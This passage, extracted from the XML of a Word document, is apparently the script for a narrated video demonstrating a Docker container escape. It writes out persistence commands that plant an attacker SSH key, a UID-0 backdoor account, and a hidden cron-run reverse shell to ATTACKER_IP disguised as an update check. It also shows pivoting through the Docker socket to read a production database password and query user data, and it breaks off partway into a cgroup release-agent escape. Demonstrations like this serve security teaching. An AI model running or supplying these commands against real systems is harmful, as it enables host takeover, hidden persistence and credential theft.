      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">TERMINAL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Method 1: Add SSH key for persistent remote access</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># mkdir -p /mnt/host/root/.ssh</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># echo "ssh-rsa AAAAB3...attacker_key... attacker@evil" \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /mnt/host/root/.ssh/authorized_keys</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># chmod 600 /mnt/host/root/.ssh/authorized_keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Method one — add an SSH public key to root’s authorized_keys. The attacker can now SSH directly to the host as root from anywhere.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Method 2: Create a backdoor user</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># echo 'backdoor:$6$salt$hash:0:0::/root:/bin/bash' \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /mnt/host/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># echo 'backdoor:$6$salt$hash:19400:0:99999:7:::' \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /mnt/host/etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Method two — create a backdoor user with root privileges (UID 0). This user can log in with a known password.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CODE EDITOR — Reverse shell cron persistence:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Method 3: Cron-based reverse shell (written to host's crontab)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># This runs on the HOST, not in the container</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Write a reverse shell script to the host</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /mnt/host/usr/local/bin/.update-check.sh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;&lt; 'EOF'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Disguised as a system update check</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i &gt;&amp; /dev/tcp/ATTACKER_IP/4444 0&gt;&amp;1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">EOF</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> +x /mnt/host/usr/local/bin/.update-check.sh</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Add to root's crontab on the host</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"*/5 * * * * /usr/local/bin/.update-check.sh"</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/mnt/host/var/spool/cron/crontabs/root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NARRATION:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Method three — write a reverse shell script to the host filesystem and register it in root’s crontab. Every five minutes, the host will reach out to the attacker’s server. The script is disguised as a system update check and hidden as a dot-file. This persists across container restarts, container deletions, and even Docker daemon restarts — because it runs on the host.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="24" w:name="Xee94bf95fe07597480cb5a7a9ba2aad1963cae1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[4:45–5:45] — Attack Step 4: Pivot to Other Containers (Terminal)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NARRATION:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">With host access, I can now reach every other container.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Access Docker socket on the host</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ls -la /mnt/host/var/run/docker.sock</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">srw-rw----</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 root docker 0 Jan 15 08:00 /var/run/docker.sock</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Use chroot to get a proper host shell</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># chroot /mnt/host bash</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root@host#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker ps</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">CONTAINER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ID   IMAGE       COMMAND      STATUS</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">a1b2c3d4e5f6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">   postgres    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"docker..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  Up 2 hours</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f6e5d4c3b2a1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">   webapp      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"node..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    Up 2 hours</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Using chroot, I’m now effectively running on the host. I can see all running containers — including a Postgres database and a web application.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Read another container's environment variables (often contain credentials)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root@host#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker inspect postgres </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'{{range .Config.Env}}{{println .}}{{end}}'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">POSTGRES_PASSWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">super_secret_db_password</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">POSTGRES_USER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">POSTGRES_DB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">There’s the database password for the Postgres container — stored in an environment variable, as is common practice. From one misconfigured container, I now have access to the production database.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Execute commands in any container</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root@host#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker exec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> postgres psql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> production </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT * FROM users LIMIT 5;"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">I can execute commands inside any container on this host. The entire multi-container application is compromised.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Exit chroot and container</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">root@host#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> exit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># umount /mnt/host</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># exit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="Xa329b24425ef08f1e4be66bef6f826f2a4b9840"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[5:45–6:45] — Alternative Escape: cgroup Release Agent (Terminal)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">NARRATION:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Let me show you a second escape technique that doesn’t even require mounting the host filesystem. This uses the cgroup release agent.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Start a new privileged container</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--privileged</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> alpine sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Create a cgroup with a release agent</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># mkdir /tmp/cgrp &amp;&amp; mount -t cgroup -o rdma cgroup /tmp/cgrp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># mkdir /tmp/cgrp/exploit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Enable the release agent notification</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># echo 1 &gt; /tmp/cgrp/exploit/notify_on_release</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Set the release agent to our payload (runs on HOST)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
